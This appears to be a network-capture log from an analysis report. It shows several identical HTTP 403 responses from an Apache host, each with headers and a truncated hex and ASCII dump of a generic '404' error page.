                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:54.115302086 CEST14565INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:54 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=130
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:55.108736038 CEST14573INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:55 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=92
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:56.189244032 CEST14581INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:56 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=110
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:57.147828102 CEST14589INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:57 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=85
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:58.417141914 CEST14597INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:58 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=109
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
